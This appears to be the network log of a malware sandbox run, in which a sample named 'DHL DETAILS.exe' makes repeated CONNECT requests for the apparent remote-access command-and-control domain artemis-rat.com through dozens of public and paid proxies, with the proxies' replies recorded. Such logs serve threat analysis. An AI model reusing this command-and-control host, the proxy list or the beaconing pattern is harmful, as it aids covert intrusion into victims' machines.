Mar 9, 2024 13:14:22.223822117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.333301067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.334757090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1440	192.168.2.5	54114	93.171.220.229	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.100189924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1441	192.168.2.5	54195	118.184.157.111	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.100601912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.447747946 CET	321	IN	HTTP/1.1 400 Bad Request Server: openresty/1.21.4.2 Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 163 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1442	192.168.2.5	53676	167.71.5.83	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.113056898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.422422886 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1443	192.168.2.5	54403	172.67.181.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.113282919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.268778086 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1444	192.168.2.5	54242	18.166.142.180	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.113804102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1445	192.168.2.5	54192	103.156.17.153	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.113804102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.185894012 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1446	192.168.2.5	53693	165.232.158.60	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.122840881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.177022934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.270714998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.271361113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1447	192.168.2.5	54244	8.217.143.187	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.123898029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.915486097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1448	192.168.2.5	54179	64.43.89.82	6341	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.124435902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.712611914 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1449	192.168.2.5	54315	217.23.11.194	32708	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.141690969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.446611881 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Mar 9, 2024 13:14:20.265551090 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1450	192.168.2.5	54309	185.100.233.101	41138	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.141784906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.447165012 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Mar 9, 2024 13:14:20.287691116 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1451	192.168.2.5	54311	161.35.83.251	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.142129898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.915484905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1452	192.168.2.5	54418	67.201.59.70	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.161082029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1453	192.168.2.5	54325	47.100.207.117	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.190948963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.500801086 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1454	192.168.2.5	54342	89.168.121.175	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.191340923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1455	192.168.2.5	54344	8.211.4.215	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.191633940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.833693027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1456	192.168.2.5	54239	185.191.236.162	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.192847013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.162249088 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1457	192.168.2.5	54303	94.30.152.172	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.192975044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1458	192.168.2.5	54402	3.97.176.251	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.196264029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.430217981 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:19 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1459	192.168.2.5	54295	195.87.217.75	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.196264982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1460	192.168.2.5	54423	199.188.93.214	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.200483084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1461	192.168.2.5	54335	157.245.48.119	43695	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.200661898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.038374901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.037106037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.942539930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.739311934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.646416903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.536767960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1462	192.168.2.5	54375	212.118.43.143	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.200900078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1463	192.168.2.5	54334	176.119.25.13	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.204770088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.915788889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.912206888 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1464	192.168.2.5	54227	91.134.140.160	2572	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.204854965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1465	192.168.2.5	54299	216.9.224.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.205293894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
